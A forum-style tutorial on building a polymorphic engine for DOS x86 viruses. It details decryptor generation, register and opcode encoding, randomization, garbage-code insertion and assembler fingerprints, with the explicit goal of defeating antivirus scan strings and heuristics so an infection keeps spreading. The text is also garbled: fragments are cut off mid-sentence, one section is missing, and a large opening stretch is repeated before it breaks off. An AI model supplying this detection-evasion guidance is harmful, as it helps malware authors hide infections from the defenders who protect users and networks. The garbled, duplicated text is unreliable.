alshares
Immersive Environment Specialist
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
100 XP
1.Introducing polymorphic code
NOTE: This article will mainly focus on 80x86 architecture.
Note: Reading time - 30 minutes +; If you follow along, even more.
Polymorphism is, in my opinion, very hard to explain well in just one
little tutorial or term.
So, let me quote Wikipedia on it to explain the term more accurately:
In computing, polymorphic code is code that uses a polymorphic engine to mutate while keeping the original algorithm intact - that is, the code changes itself every time it runs, but the function of the code its semantics will not change at all. For example, the simple math expressions 3+1 and 6-2 both achieve the same result, yet run with different machine code in a CPU. This technique is sometimes used by computer viruses, shellcodes and computer worms to hide their presence. As I went through the internet I was wondering where to learn such an interesting method of encrypting code, especially in Assembly. So I just decided to make an article about it. look like one. This will fool most heuristic engines.
At this point the virus can’t be spotted as an unknown virus (this type of virus scanning is called “generic” detection, of which heuristic detection is an example). But this still is not enough. Once the virus reaches an AV person meaning a professional reverse-engineer who commonly knows what he is doing, he can easily make a scan string from your 133+ anti-heuristic decryption routine resulting in all your effort drowning down the drain. Your virus / malware suddenly becomes detectable by every AV product known to mankind… (I know, it’s a bit exaggerated, but it’s a real nuisance if something gets detected and reverse-engineered…)
To prevent the AV community from using scan strings to detect your virus, you should avoid any constant values in the virus. We already encrypted the virus body, but the decryptor always remains constant, and can therefore be used for a scan string. Of course, we can’t encrypt the decryption loop, but a possible solution is letting the virus produce different decryption loops for each (number of) infection(s). This way, one copy of the virus will never look the same as another one. In other words: An AV product can’t possibly detect the virus with a scan string.
Nice, but is this really worth all the hassle (considering e.g. most of the time engines are larger than the viruses itself) ? Most of the time: YES. First of all, a polymorphic virus is very annoying for the AV people or rather engineers, and assuming the engine is complex enough, they have to design a detection method dedicated to your particular engine. This will take some time, which gives your virus some more time to spread. Second of all, designing a detection method which cathces 100% of all possible generations is very hard. The more complex your engine is, the harder it will be. If your polymorph is
not 100% detectable, it still stands a chance to survive, EVEN if AV say they can detect it. At this point I agree with Bontchev:
Any detection rate below 100% is practically useless, as one wrongly left infected file can re-infect the whole system/network. Concluding, it’s fair to say that (well implemented) polymorphism is a very powerful tool as both a pre- and post-discovery strategy.
3. How do I call an engine?
The first thing that needs to be understood is how an engine normally is implemented in a virus.I’ll explain it. Here’s an example: (If you already understand this, you can skip this chapter, but keep these
parameters in mind, as I will be referring to them in the following example engine.)
Entry parameters:
DS:SI = code to be encrypted (virus body)
ES:DI = place to put decryptor and encrypted code
CX = code length
AX = offset in memory of virus entry
Returns:
CX = length of decryptor + encrypted code
DS:DX = offset of decryptor and encrypted code
What the engine will do, is encrypt a piece of code (the virus) with
some nice scheme, and place a matching decryptor in front of it. As you can
see, a user-friendly engine returns the parameters in i21/40 format: after
the engine is called, the virus needs only to set AH=40 and call Int21,
assuming the handle is in BX. Note that the input ES:DI and the output DS:DX
are the same.
So, what to do is the following:
(1) Set the correct parameter to point to the virus body, here DS:SI;
(2) Set the correct parameter to a free space in memory, big enough to
hold the decryptor and the encrypted virus body (Don’t forget to
include the engine in the size it’s a part of the virus.)
Here this parameter is ES:DI. Mostly the free space used is after
the virus.
(3) Set the correct parameter to the size of the virus (again include
the size of the engine, as it is a part of the virus).
(4) Set the memory offset parameter (here AX) to it’s correct value. This
is the offset (in memory, when the file is loaded) at which the
decryptor will start. This may require an example:
When infecting a 200 (decimal) bytes long COM, the offset at which the
decryptor (the beginning of the virus) will start would be 100h + 200d
= 1C8h. Note that the offset in the FILE would be 200d = C8h, but as
you know a COM file is loaded in memory after PSP, ie. starting from
offset 100h. With EXEs, this value would be the EXE’s new IP you’re
storing in the file header, as DOS doesn’t mess with this offset.
(5) We’re almost ready to call the engine. The last thing to check is
if the engine destroys registers that aren’t used as parameters. It
will save you some debugging.
After that, call poly.
4. An example
A polymorphic engine produces (from a given amount of variations) a random decryptor which matches the (also random) encryption method on each infection. How does it know how to do that? The programmer of the engine thought of a couple of decryptor layouts, from which the engine chooses one,
and then it randomizes any variable bytes in it. This requires explanation: Let’s just assume that a (primitive) engine has only one decryptor layout.
Let’s say it looks like this:
MOV <reg16> , offset_of_first_encrypted_word ;[1]
:decrypt_next_byte:
<crypt> [<reg16>] , random_immediate ;[2]
<reg16> ;[3]
CMP <reg16> , offset_of_last_encrypted_word ;[4]
JB decrypt_next_byte ;[5]
Legenda: <reg16> = a random 16 bit register (AX, BX, SI, BP, etc.)
[<reg16>] = pointer to contents of offset stored in <reg16>
eg: BX=1234, [BX]=what's at offset 1234
<crypt> = a crypt instruction, eg: XOR, ADD, SUB
= add 2 to the <reg16> (add 1 for byte encryption)
The engine will fill in all variable values:
[1] It selects (from a table given by the programmer) a random register to
work with. In this example the engine will store the MOV instruction
encoded with the correct register (more on this later), after which it
will store the offset of the first encrypted byte (or word) of the virus.
[2] After that, it selects (again from a table given by the programmer) a
decrypt operation. Note that the engine has to remember which decrypt
operation it chose, because later on, the virus has to be encrypted in such
a way that the previously generated decryptor will correctly decrypt the
virus. That’s right, the encryption method is derived from the generated
decryptor. The engine stores the crypt-instruction, and then it will
generate a random value (c.f. immediate) which will accompany the crypt
operation. Again this value needs to be remembered, otherwise later on, the
virus can’t be encrypted so that the decryptor works. For example, if the
random value is 1234 and the crypt-operation is XOR and the register is BX,
the crypt-instruction is XOR [BX],1234 (duh). The engine stores the value,
and repeats [3] for a (random) amount of times, as one single encryption
operation yields a weak encryption.
[3] Add 2 to . Advanced engines make a choice whether to use byte or
word encryption, this engine uses word encryption. The
register needs to be increased by two, so that in the next decryption loop
the decryptor will decrypt the next word.
[4] Compare the register to EOV (end of virus). Speaks for itself.
[5] If we haven’t reached EOV yet, jump and decrypt the next byte/word.
4.1 Register Encoding
In this example the engine wants to pick a register. To understand how this works we need to take a look at instruction encoding of the 80x86. If you don’t have technical documents at hand you can easily grab SoftIce and a Hex-Bin calculator to start investigating. Here’s a piece of MOV reg16,reg16 when I looked at it:
INSTRUCTION HEX BINARY
MOV AX,AX 8BC0 10001011 11000000
MOV AX,BX 8BC3 10001011 11000011
MOV AX,CX 8BC1 10001011 11000001
MOV AX,DX 8BC2 10001011 11000010
MOV BX,AX 8BD8 10001011 11011000
MOV BX,BX 8BDB 10001011 11011011
MOV BX,CX 8BD9 10001011 11011001
MOV BX,DX 8BDA 10001011 11011010
MOV CX,AX 8BC8 10001011 11001000
MOV CX,BX 8BCB 10001011 11001011
MOV CX,CX 8BC9 10001011 11001001
MOV CX,DX 8BCA 10001011 11001010
(…)
Obviously, the first byte in a MOV reg16,reg16 instruction always is 10001011b or 8Bh. The second byte
only changes a little if we alter the registers. A closer look reveals that bit 5-7 always remain 110.
NOTE: The bit most to the right is called bit 0, so the bit most to the left is the last bit: bit 7. A byte consisting of 7 bits instead of 8? No, bit 0 is the 1st bit, so bit 7 is the 8th bit.
The last bits remain 110. Now it looks like the rest of the byte changes all the time, which is indeed the case. I hear the attentive reader shouting: but what about the 5th and the 3rd bit?! Well, in this example I didn’t use the 16 bit registers SI, DI, SP and BP. Those ones can also be encoded, and they require that third bit.
Conlusion: 10001011 11… = MOV reg16,reg16
Note that the first three dots are filled by bits representing the TARGET register, ie. the one to the left, and the second three are representing the SOURCE register, the one to the right.
The attentive reader probably noticed that I just explained the MOV reg16,reg16 instruction, while the MOV in the example engine doesn’t need the two registers after the MOV, but only one register and an immediate (the starting offset). Let’s take a look at that:
INSTRUCTION HEX BINARY
MOV AX,1234 B83412 10111000 00110100 00010010
MOV CX,1234 B93412 10111001 00110100 00010010
MOV DX,1234 BA3412 10111010 00110100 00010010
MOV BX,1234 BB3412 10111011 00110100 00010010
MOV SP,1234 BC3412 10111100 00110100 00010010
MOV BP,1234 BD3412 10111101 00110100 00010010
MOV SI,1234 BE3412 10111110 00110100 00010010
MOV DI,1234 BF3412 10111111 00110100 00010010
This time it may be more interesting to look at the Hex values than to look at the binary values. I have sorted the instructions a bit, so it shouldn’t be hard to see a pattern. The difference with the previous example is that the ‘register encoding’ in the instruction is now done in the first (and only) byte of the instruction itself. The whole instruction takes three bytes: one for the instruction itself with a register encoded in it, and in the other two the immediate is stored, in Intel little-endian format.
When we further analyze this example, we see that (in the first byte) only the last three bits change every time. Considering the fact that 3 bits are necessary to encode 16 bit registers in instructions, that should be fine.
Conclusion: 10111… 00110100 00010010 = MOV , 1234
Now it’s time to list the registers and how they’re encoded in instructions. Looking at both examples we can easily spot following:
AX = 000b = 0h
CX = 001b = 1h
DX = 010b = 2h
BX = 011b = 3h
SP = 100b = 4h
BP = 101b = 5h
SI = 110b = 6h
DI = 111b = 7h
All usable 16bit registers are listed here (IP doesn’t count), and we can see that they all just fit in the available 3 bits. What a coincidence… Write this list down, you’ll be needing it.
The question is now, how do we tell the engine to do this? Very simple: the boys at Intel invented the OR instruction. I think many beginner virus writers do not know the exact purpose of this instruction, while for simple COM/EXE techniques this instruction is seldomly used. I think you should keep that in mind… :
0 OR 0 = 0
0 OR 1 = 1
1 OR 0 = 1
1 OR 1 = 1
But you’re probably wondering: for what purpose would I ever want to use this instruction? Well, what it actually does, is making sure that in the target byte all bits are SET (=1), which are set either in value 1 OR in value 2. And this is very useful for register encoding: Remember our “wildcard” for MOV ,? It was: 10001011 11… = MOV ,, with the first three dots for the target reg16, and the second three for source reg16. Say we fill the dots with zeros, and then OR them with the encoding value for registers. Say we wanted MOV BX,CX. First we’d want to move the value 10001011 11000000 (the basic value for MOV ,) in a register, otherwise the CPU can’t work with it. We’ll put it in AX:
MOV AX, 8BC0h (use your bin2hex calculator)
Then we want to have the encoding value for the target register in bit 3-5, and the source register in bit 0-2, because the MOV instruction requires us to do so. BX=011b and CX=001b, so when we put this together we get: 011001b What happens when we OR this value with AX (which contains the value for a
MOV instruction): OR AX, 19 (again use the bin2hex calculator).
AX = 8BC0 = 10001011 11000000
19 = 00000000 00011001 OR
---------------------
10001011 11011001 ;which is 8BD9, which is MOV BX,CX
Mission accomplished, you now know how to encode registers in instructions.
4.2 Picking a register
One of the first things an engine needs to do, is to pick a register to work with. Here we will see a big drawback of this particular decryptor layout example. In this example we are using registers to point to memory locations, that means e.g. XOR [BX],1234. Due to the 80x86 architecture, we are limited to but four registers to do that, namely BX, SI, DI and BP. So XOR [AX],1234 for example is an illegal instruction. Only those four registers are capable of this addressing mode.
*There's one problem with BP though. Let me show you something:*
81 37 34 12 XOR WORD PTR [BX],1234
81 77 01 34 12 XOR WORD PTR [BX+1],1234
In the first instruction, we’re addressing with just the register, without a relative offset. In the second instruction, we DO have a relative offset, and it is encoded in an extra byte. Note that the second byte changes from 37 to 77 when we introduce the relative offset. On bitlevel, 37 and 77 only differ 1 bit, namely the sixth. This is of course to let the CPU know whether there will be a relative offset or not.
81 34 34 12 XOR WORD PTR [SI],1234
81 74 01 34 12 XOR WORD PTR [SI+1],1234
The same story goes for SI. When there is no relative offset accompanying the register (in other words: relative offset = 0), the instruction looks different. And it also applies to DI, but not for BP.
81 76 00 34 12 XOR WORD PTR [BP+00],1234
81 76 01 34 12 XOR WORD PTR [BP+1],1234
As you can see, when there is no relative offset accompanying the register, it’s still encoded, simply as a zero byte.
What does this have to do with the engine? Well, in the decryptor in the example, we’re addressing without a relative offset. For SI, DI and BX goes that there will not be a zero byte to let the CPU know, but just a bit set or unset in the instruction byte. This is a good thing, because otherwise we would have a stable byte (i.e. a byte that’s the same in each decryptor generated), namely the zero. So if we wanted the engine to be able to pick registers from a list which included BP, we would have to write a routine
that checks if he picked BP, and if so, adjust the instruction byte, and write the extra zero. Of course, for the purpose of creating decryptors as random as possible, this is a good idea. This, however, is an advancement to be worked on when you finished a working engine. I’m giving you a good advice here: don’t try to create a complex engine right away, first start with a simple but working ‘framework’, which you can expand later on. If you start including all kinds of nice features, you’ll probably just end up debugging and that for a very long time.
Back to the example. I’m assuming we’ll just use BX, SI and DI, so we don’t have to deal with that relative offset. Just put the register encoding values for BX, SI and DI ina table, and let the engine choose from them.
Maybe you’re wondering why I told you this whole story about BP and it’s relative offset. It’s not really that important and specifically a problem for this type of decryptor layout, and I also just could’ve told you:
don’t use BP in this example. I didn’t, because I wanted to let you know you can’t just “assume” stuff, and you should check everything.
4.3 Moving
In the example engine, we want to have MOV , imm16, which looked like:
10111... 00110100 00010010 = MOV <reg16>, 1234
We don’t want the 1234, so forget the last two bytes. Important is that the instruction byte (the first byte) is 10111…, with a register encoding value filling the last three dots.
Example: how would we make the engine generate a MOV SI,0120 in the decryptor? We’d first have to fill the dots in the unencoded value for MOV , imm16 with zeros, so we can OR the value to the correct opcode. From now on, when I’m talking about an unencoded value for an instruction, I’m assuming the dots are filled with zeros. Okay, so the unencoded value for MOV , imm16 is B8h (converted in hex), let’s put that value in AX. Then, we’d have to OR AX with the correct register encoding value. We wanted SI, whose value is 6h (110b) so we will perform: OR AX,6h.
4.4 Decrypting
Let me first of all mention once again the fact that the strategy behind most engines is that first the decryptor is generated, and after that the correct (matching) encryption is applied to the virus. Just to prevent some confusion.
´Now, we want to make a decryptor, and we want each decryptor to be as random as possible. So we have to give the engine as much as possible crypt operations. XOR, ADD and SUB are good examples, because they have the same instruction layout. They work with 2 operands, for our purpose we will have
the pointing register, and a random 16 bit immediate, so e.g. SUB [BX],1234. It’s a good to include more crypt operations like NEG, NOT, INC, DEC, but the disadvantage of these other types is that they have other instruction layouts, and therefore require separate routines for including in the decryptor. If you decide to include more crypt operations in your engine, these four are a good choice, because they all require one operand, and for our example engine that would be a pointing register, e.g. not [SI]. Let’s just say our example engine uses only XOR, ADD, and SUB.
Again, to build an instruction, we need to know the unencoded value for the instruction. Assuming the dots (where the register encoding should take place) are filled with zero-bits, here are the values:
XOR: 81 30 xx xx
ADD: 81 00 xx xx
SUB: 81 28 xx xx
Please note that these are the values for use with pointing registers. So with these values, you would be able to produce an instruction like XOR [SI],1234 but not XOR SI,1234 ! We need pointing registers for our example engine, so the above values will do.
Another important note: the first byte is 81, no matter what crypt instruction the engine picks… That’s not the best solution, because the whole idea of the engine is that we wouldn’t have “stable bytes” in the decryptor. So you can see you can’t just do with only these three crypt operations, simply
because it’ll create a stable byte. As said, it is wise to ignore this for the time being, and first try to create a working engine. Then you can start working on problems like these. Well, you actually need to work on them, because if you leave stable bytes in your decryptor, you still haven’t eradicated the possibility for scan strings.
Okay, back to the program, say the engine picked ADD to include as crypt operation. We can simply store the 81, while it doesn’t need any register encoding. Then we have to encode the correct register in the second instruction byte. Earlier, we encoded just the registers in the instruction, and now we need to encode pointing registers in the instruction. I haven’t given you the encoding values for the pointing registers, so here they are:
000b = 0h = [BX+SI]
001b = 1h = [BX+DI]
010b = 2h = [BP+SI]
011b = 3h = [BP+DI]
100b = 4h = [SI]
101b = 5h = [DI]
110b = 6h = [immediate]
111b = 7h = [BX]
You should see a possible advancement: addressing using two registers. For example, set BX to zero, and let SI be the pointing register, but now use [BX+SI] instead of just [SI] to address the correct byte/word. That results in more randomness.
OR 30h with the correct register encoding value, store the byte, and store a random 16 bit immediate. Don’t forget to “remember” which cryptop the engine stored, and which immediate it used. Most engines create an encryptor along the way, which can be executed when the decryptor is generated.
This is only one crypt operation. Just repeat this step a couple of times, depending on how much crypt operations you want in your decryptor.
4.6 Increasing
Now it’s time in the decryptor to increase the register. Since we’re using word encryption, the register needs to be increased by two. Obvious instructions are two INCs; ADD reg, 2; or maybe even SUB reg, -2. But also consider string instructions like SCAS, CMPS, STOS, LODS and MOVS. They perform an action, and then increase SI, DI or both. That could suit our purposes quite well. However, be careful with these, as for instance MOVS may have some unwanted results. I think you should be able to find the correct values for these instructions. To make this tutorial not too longwinded I will only shortly explain the use of the two INCs, as you now should be able to figure out the rest yourself.
The unencoded hex value for INC is 40hex (hi P/S) and you should encode it with the normal register encoding values (not the pointing registers, because that would be a crypt operation! (compare INC BX and INC [BX])) to get the necessary result. E.g. INC SI would be OR 40, 6. With 6 being the register encoding value for SI. This should be clear by now. not the pointing register values), and store the result.
After that, we’ll have to store the imm16. This value is the last byte/word that needs decrypting. How do we calculate this value? Rather simple: starting offset + code length. Code length is passed to the engine using CX, and the starting offset can be calculated by memory offset + decryptor length. Memory offset was again a parameter for the engine, namely AX, and the decryptor length shouldn’t be hard to calculate. If your decryptors are always the same length it’s easy, but when you have variable length decryptors, you should keep track of how many bytes you’re storing. So:
AX length CX
/---------------±--------------\ /----±-----\ /-----------±----------|
.---------------------------------.-------------.-------------------------.
| Host file | Decryptor | Virus body |
‘---------------------------------’-------------‘-------------------------’
last byte/word to be encrypted ------/
AX + decryptor length + CX = CMP operand
Add the values, and store it as operand.
4.7 Jumping
After the CMP comes a conditional jump. The obvious instruction would be JB, but that again introduces a stable byte, because we don’t have a substitute for it. Of course, JNA would be nice, but the problem is they have the same hex values, which is not so weird considering that they do exactly the same thing. What about JNZ? This could be interesting, but only if we’d add one/two to the CMP operand… Otherwise the last byte/word wouldn’t get decrypted… Again, I’m assuming we’re only using JB. (Note that IF you choose to use the JNZ feature the following explanation also sort of applies to it).
If the condition is met (condition = we’re below the last byte/word) the jump should jump back to the first decryption operation. How do we “encode” this? First of all, JB has 72h as hex value, so we can store that. As you all should know from COM infections, such a jump has a displacement byte right behind it. This displacement byte is the amount of bytes the CPU should move IP, where you should see the starting point at the offset of the next instruction (so 2 instructions behind the 72 of the JB). Here’s an
example:
0BF9:03B6 81 37 64 23 XOR [BX],2364
0BF9:03BA (...) (...)
0BF9:03C6 81 FB A4 06 CMP BX,06A4
0BF9:03CA 72 EA JB 03B6
0BF9:03CC (...) (...)
In this example the first decrypt operation starts at offset 3B6. The “next instruction” of which I was talking would start at 3CC in this example. So the correct calculation for the JB displacement would be:
New offset - Offset of next instruction = Displacement
3B6 - 3CC = FFEA
As you can see, we get FFEA as displacement. We can only use one byte, so that would be EAh. Now most of the time you would say that EAh = 234d, but there’s also something to say for EAh = -16d, and that’s exactly the amount of bytes the CPU should move. Note that you don’t have to worry about things like the memory offset, because it doesn’t matter where in memory this is located: The displacement will be the same every time, as the amount of bytes to move doesn’t change.
5. Encrypting
At this point we’re done with the decryption loop. Along the way I was telling you your engine should “remember” what it did. Sounds okay, but you’re probably wondering how that works. First of all, it is wise when making a table with crypt operations, to include the inverse crypt operations. E.g. store SUB along with ADD, ADD along with SUB, and XOR along with XOR. In that way, you can store the decrypt operation in the decryptor, and the inverse crypt operation (for encrypting) in the encryptor. Note that the
first instruction in the decryptor should have it’s inverse operation as last operation in the encryptor.
6. Randomize
Throughout this tutorial I told you to let your engine pick something at random. Most high level languages have functions which return a “random” value, but, as usual in assembly language, we get to do it ourselves.
As there is no way you can actually make a computer return a totally random value, because it just can’t do that, we have to build a routine that gives us a value as random as possible. The most used way to get a random value is reading from port 40h. Because the value isn’t really random, it’s wise to perform some calculations, which would randomize the number some more. Another possibility is to let the decision depend on a value like system time or date.
BTW: when you manage to do this correctly, you’ll get a form of slow
polymorphism.
Experiment with calculations and write a program which outputs the random values to screen on bitlevel. Investigate the values to check if they really are quite random. Note that this is quite important, and if you rely on a bad randomizer, you’ll end up with some options of your engine getting disabled, as they’re never reached.
Once you have a random value, and you want to use it to decide e.g. which cryptoperation you will use, you have to AND it out to e.g. the offset of the last value of the table. (If you don’t understand what AND is: AND makes sure that in the result byte only those bits will be set, which are both set in the first operand AND in the second operand.If necessary, re-read the part about OR, and investigate AND in the same way, i.e. try to get to know what it really does.) So, if you have 5 options, AND the random value out to 4, so you can add it to the starting offset of the table. Don’t AND it out to 5, because the starting offset + 5 is just behind the table. This is because at offset 0 there is a value too. So, if you have x values, AND the random value out to x-1.
There is one problem though, which is overlooked by some writers. Get your hex2bin calculator, and start ANDing random values with 4h. Say you do it 100 times, you’ll only get either 4 or 0 as a result. You’ll NEVER get 1, 2 or 3. Hmm… weird… Let’s try it with 5h. Perform AND xx,5 with 100 values, and you’ll get 0, 1, 4 and 5. But NEVER 2 or 3. To understand this problem, we have to look at the values we’re ANDing with at bitlevel:
0h = 00000000b
1h = 00000001b
2h = 00000010b
3h = 00000011b
4h = 00000100b
5h = 00000101b
6h = 00000110b
7h = 00000111b.
When ANDing with a value, bits in the result byte will only be set if they’re also set in the value you’re ANDing with. Say you’re ANDing with 5h, and you’d want to get 3h as a result. 3h equals 10b so that means that in the value we’re ANDing with, bit 1 should be set. Because the value we’re ANDing with is 5h, and that equals 101b, bit 1 can NEVER be set. So you’ll never get 3h as a result. Again, this is quite important, because if you choose to neglect this problem, you’ll end up with some features of your engine simply being disabled…
I hope you already have a feeling that values with all (necessary) bits set are suitable for ANDing with, as the result of the operation varies from 0 to the value you’re ANDing with, which is what we want. So 1b (mostly unnecessary), 11b, 111b, 1111b and so on, are values suitable for ANDing with. If you have too few options in your table and can’t think of another option to fill the table with (so you can AND with one of the mentioned values), you could simply put duplicate options in your table. This isn’t as unsophisticated as it may seem at first glance, as some options are more flexible than others: e.g. when deciding whether the engine should use normal INC or a string operation (LODS, STOS, etc.) for increasing, the option for “use a string operation” is attractive for duplicating in your table, as it has more sub-options (later on, the engine has to decide which string operation it should use) than the “use an INC” option.
Please note that this is just one way of working around this problem. At this point you can make use of your creativity to come up with another solution if you wan to. But somehow I can’t imagine that it’s really efficient memory-wise.
7. Sidenote
One more important note. When working on your own engine, you’re probably planning on adding some nice features. And when you’re including new instructions, you need to know the unencoded values of these instructions. If you’re not instantly running SoftIce in the background it’s probably very tempting to use DOS DEBUG to check out the values. Never do that… There is something very strange about the 80x86 architecture:
Some instructions can take two different identities. E.g. the instruction “OR AX,AX” can take “09C0” as “identity”, but “0BC0” gives us the exact same instruction.
All so called “official” assemblers like Borland TASM, Microsoft’s MASM and allothers, pick the same of the two choices they can make, namely the “highest” (so “0BC0” for “OR AX,AX”). In other words, if a certain instruction takes an identity which normally wouldn’t be produced by regular assemblers, it
is very likely this is the work of some polymorphic engine. Some (or most?) antivirus programs know this and alarm if they find such an instruction. I recommend using SoftIce anyway (although it’s assembler also has some bugs), but if you for some strange reason don’t or can’t, use Borland’s TurbodeBugger
to check the values, I guess that should do the trick too.
A sidenote to this sidenote: The still ever popular A86 shareware assembler has a nasty side-effect to it.
At times, it seems to pick the “wrong” one of the two possible instruction codes, resulting in the same alarms being produced. This can easily be avoided by using the TASM Assembler. There’s no reason for not using TASM anyway.
8. “Garbage”
Garbage instructions are instructions included in the decryptor, which serve no real purpose for the execution of the decryptor, but are only included to hide the so obvious real purpose of the decryptor. Without any garbage, the decryptor actually looks like a decryptor, which makes it very easy to spot heuristically. Furthermore, garbage instructions will let the “real” instructions be at random places (in a constant order of course). In one generation the increase and compare operation are right next to each other, while in another generation some other (do-nothing) instruction is included between them.
The classical concept of garbage instructions consists of including one-byte do-nothing instructions like NOP, CLC, STC, INT 3 (the only one-byte interrupt (CCh)) between the actual decryptor instructions. Nowadays, the use of these one-byte instructions has become rather trivial, as almost all AV programs just ignore these instructions when they encounter a decryption loop.
These one-byte do-nothing instructions have also lead to something AV calls variable scan strings. In these scan strings, it doesn’t matter if you have zero or thousands of garbage instructions between two constant values, the AV program just ignores those, and just checks if the two constant values occur in the right order (so, first the increase, then the compare instruction, here assuming these are stable bytes in the decryptor). In other words, these one-byte garbage instructions really serve no purpose anymore.
Furthermore, AV has noticed that huge amounts of these kinds of garbage instructions in a relatively small area are very likely to be the results of a polymorphic engine. In other words, using these one-byte do-nothing instructions can result in heuristic flags being triggered.
Luckily, there are other ways of producing “garbage code”. The basic idea behind all of them is producing code which could be code required for the program to run correctly. A nice example is including some stupid Int21 call, like GetVersion or something. There are a lot of possibilities here. Each time take two things in account:
(*) Whatever garbage you use, make sure it doesn't influence the
execution of the decryptor, but also make sure it LOOKS like useful
code
(*) When using large garbage constructions (like the setting up of an
Int21 call), make sure you have enough variations, otherwise AV could
make a scan string (or some more if that would be enough) just from
your garbage code!
Things to be considered are the possibility of including some nice armor tricks in the garbage construction (I’m calling it construction because sometimes the “garbage” doesn’t consist of just one instruction anymore), but again, make sure to have enough variations, because armor code is of course
uncommon code, which AV loves, because they can make scan strings of it…
For those wondering how to include garbage instructions/constructions at random: Just place a call to your insert_garbage_at_current_offset before each major decryptor operation. An extremely simplified example:
start:
call maybe_insert_garbage
call set_up_registers
call maybe_insert_garbage
call perform_move_instruction
call maybe_insert_garbage
call do_first_crypt_operation
call maybe_insert_garbage
(...)
9. Multiple Decryptors
A virus writer which for some reason doesn’t want to include a complete engine, but still wants some variation in his decryptors may consider the use of a couple of constant decryptors. They all do the same thing, but they look different. Here, the variation isn’t on instruction level, but on routine level, which is far more simpler to implement. This technique can be called polymorphic in it’s true meaning (poly=many, morph=shape), but as just a few routines are generated, it’s often called oligomorphic (oligo=few). On it’s own this method isn’t considered optimal regarding this kind of type of malware, as a set of scan strings can be used to identify every possible generation.
The combining of these two methods however gives a very large variety of both decryptor layouts and decryptor instructions, which can be considered strong polymorphism (don’t mix it up with something in the object-oriented programming language world). Most of the more powerful engines combine the two methods, and are therefore very hard to detect reliably.
10. Conclusion - The very end of this article
Throughout this tutorial I have tried to explain how to avoid constant
values using variation on instruction level. If you want to extend your engine
with variation on routine level you’ll have to use well-considered code. The engine
should decide which decryptor layout (routine) it will generate, and then it
should generate that particular routine. As some things have to be done in
more decryptor layouts (e.g. increasing the register) it’s often wise to make
routines (for e.g. increasing the register) which are independant on from which
decryptor-layout setup they are called from. So the increase_pointer routine
(which on his turn chooses from a variation of instructions) must be able to
be called from different layout setups.
As you may have noticed this article is rather long and was time consuming to write. I hope it was at least at some points understandable.
If the resonance suggests it, I might just release another article about oligomorphic or even metamorphic Assembly (depending on what you might want to have released…?)…
Greetings.
NOTE: This article will mainly focus on 80x86 architecture.
Note: Reading time - 30 minutes +; If you follow along, even more.
Polymorphism is, in my opinion, very hard to explain well in just one
little tutorial or term.
So, let me quote Wikipedia on it to explain the term more accurately:
In computing, polymorphic code is code that uses a polymorphic engine to mutate while keeping the original algorithm intact - that is, the code changes itself every time it runs, but the function of the code its semantics will not change at all. For example, the simple math expressions 3+1 and 6-2 both achieve the same result, yet run with different machine code in a CPU. This technique is sometimes used by computer viruses, shellcodes and computer worms to hide their presence. As I went through the internet I was wondering where to learn such an interesting method of encrypting code, especially in Assembly. So I just decided to make an article about it. look like one. This will fool most heuristic engines.
At this point the virus can’t be spotted as an unknown virus (this type of virus scanning is called “generic” detection, of which heuristic detection is an example). But this still is not enough. Once the virus reaches an AV person meaning a professional reverse-engineer who commonly knows what he is doing, he can easily make a scan string from your 133+ anti-heuristic decryption routine resulting in all your effort drowning down the drain. Your virus / malware suddenly becomes detectable by every AV product known to mankind… (I know, it’s a bit exaggerated, but it’s a real nuisance if something gets detected and reverse-engineered…)
To prevent the AV community from using scan strings to detect your virus, you should avoid any constant values in the virus. We already encrypted the virus body, but the decryptor always remains constant, and can therefore be used for a scan string. Of course, we can’t encrypt the decryption loop, but a possible solution is letting the virus produce different decryption loops for each (number of) infection(s). This way, one copy of the virus will never look the same as another one. In other words: An AV product can’t possibly detect the virus with a scan string.
Nice, but is this really worth all the hassle (considering e.g. most of the time engines are larger than the viruses itself) ? Most of the time: YES. First of all, a polymorphic virus is very annoying for the AV people or rather engineers, and assuming the engine is complex enough, they have to design a detection method dedicated to your particular engine. This will take some time, which gives your virus some more time to spread. Second of all, designing a detection method which cathces 100% of all possible generations is very hard. The more complex your engine is, the harder it will be. If your polymorph is
not 100% detectable, it still stands a chance to survive, EVEN if AV say they can detect it. At this point I agree with Bontchev:
Any detection rate below 100% is practically useless, as one wrongly left infected file can re-infect the whole system/network. Concluding, it’s fair to say that (well implemented) polymorphism is a very powerful tool as both a pre- and post-discovery strategy.
3. How do I call an engine?
The first thing that needs to be understood is how an engine normally is implemented in a virus.I’ll explain it. Here’s an example: (If you already understand this, you can skip this chapter, but keep these
parameters in mind, as I will be referring to them in the following example engine.)
Entry parameters:
DS:SI = code to be encrypted (virus body)
ES:DI = place to put decryptor and encrypted code
CX = code length
AX = offset in memory of virus entry
Returns:
CX = length of decryptor + encrypted code
DS:DX = offset of decryptor and encrypted code
What the engine will do, is encrypt a piece of code (the virus) with
some nice scheme, and place a matching decryptor in front of it. As you can
see, a user-friendly engine returns the parameters in i21/40 format: after
the engine is called, the virus needs only to set AH=40 and call Int21,
assuming the handle is in BX. Note that the input ES:DI and the output DS:DX
are the same.
So, what to do is the following:
(1) Set the correct parameter to point to the virus body, here DS:SI;
(2) Set the correct parameter to a free space in memory, big enough to
hold the decryptor and the encrypted virus body (Don’t forget to
include the engine in the size it’s a part of the virus.)
Here this parameter is ES:DI. Mostly the free space used is after
the virus.
(3) Set the correct parameter to the size of the virus (again include
the size of the engine, as it is a part of the virus).
(4) Set the memory offset parameter (here AX) to it’s correct value. This
is the offset (in memory, when the file is loaded) at which the
decryptor will start. This may require an example:
When infecting a 200 (decimal) bytes long COM, the offset at which the
decryptor (the beginning of the virus) will start would be 100h + 200d
= 1C8h. Note that the offset in the FILE would be 200d = C8h, but as
you know a COM file is loaded in memory after PSP, ie. starting from
offset 100h. With EXEs, this value would be the EXE’s new IP you’re
storing in the file header, as DOS doesn’t mess with this offset.
(5) We’re almost ready to call the engine. The last thing to check is
if the engine destroys registers that aren’t used as parameters. It
will save you some debugging.
After that, call poly.
4. An example
A polymorphic engine produces (from a given amount of variations) a random decryptor which matches the (also random) encryption method on each infection. How does it know how to do that? The programmer of the engine thought of a couple of decryptor layouts, from which the engine chooses one,
and then it randomizes any variable bytes in it. This requires explanation: Let’s just assume that a (primitive) engine has only one decryptor layout.
Let’s say it looks like this:
MOV <reg16> , offset_of_first_encrypted_word ;[1]
:decrypt_next_byte:
<crypt> [<reg16>] , random_immediate ;[2]
<reg16> ;[3]
CMP <reg16> , offset_of_last_encrypted_word ;[4]
JB decrypt_next_byte ;[5]
Legenda: <reg16> = a random 16 bit register (AX, BX, SI, BP, etc.)
[<reg16>] = pointer to contents of offset stored in <reg16>
